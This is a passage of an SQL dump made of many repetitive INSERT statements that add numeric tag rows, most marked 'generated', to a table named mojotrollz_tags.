0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1941, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1941, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1942, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1942, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1943, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1943, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1944, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1944, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1946, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1947, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1947, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1948, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1948, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1949, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1949, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1950, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1950, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1951, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1951, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1952, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1952, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1953, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1953, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1954, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1954, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1955, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1955, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1956, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1956, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1957, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1957, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1958, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1958, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1959, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1959, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1960, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1960, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1961, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1961, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1963, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1963, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1964, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1965, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1965, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1971, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1971, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1972, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1972, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1973, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1973, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1974, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1974, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1975, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1975, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1976, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1976, 1, 2, 1519, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1976, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1977, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1977, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1978, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1978, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1981, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1983, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1983, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1984, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1984, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1985, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1985, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1986, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1986, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1988, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1988, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1989, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1989, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1992, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1992, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1993, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1993, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1994, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1994, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1995, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1995, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1996, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1996, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1997, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1997, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1998, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1998, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1999, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1999, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2000, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2000, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2001, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2001, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2002, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2002, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2003, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2003, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2004, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2004, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2005, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2005, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2006, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2006, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2007, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2007, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2008, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2008, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2009, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2009, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2010, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2010, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2011, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2011, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2012, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2012, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2013, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2013, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2014, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2014, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2015, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2015, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2017, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2017, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2018, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2018, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2019, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2019, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2020, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2020, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2021, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2021, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2022, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2022, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2025, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2025, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2027, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2027, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2029, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2029, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2030, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2030, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2031, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2031, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2032, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2032, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2033, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2033, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2034, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2034, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2038, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2038, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2039, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2039, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2041, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2041, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2042, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2042, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2043, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2043, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2044, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2046, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2046, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2050, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2050, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2050, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2050, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2050, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2053, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2053, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2054, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2054, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2055, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2055, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2055, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2055, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2055, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2056, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2057, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2057, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2058, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2058, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2060, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2061, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2062, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2063, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2064, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2065, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2066, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2067, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2068, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2069, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2069, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2070, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2070, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2071, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2071, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2077, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2077, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2078, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2078, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2079, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2079, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2080, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2080, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2081, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2081, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2082, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2082, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2083, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2083, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2084, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2084, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2086, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2086, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2089, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2089, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2090, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2090, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2091, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2091, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2092, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2092, 1, 2, 1537, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2092, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2093, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2093, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2094, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2094, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2096, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2096, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2097, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2097, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2098, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2098, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2099, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2099, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2102, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2102, 1, 30, 0, 'generated'); INSERT INTO 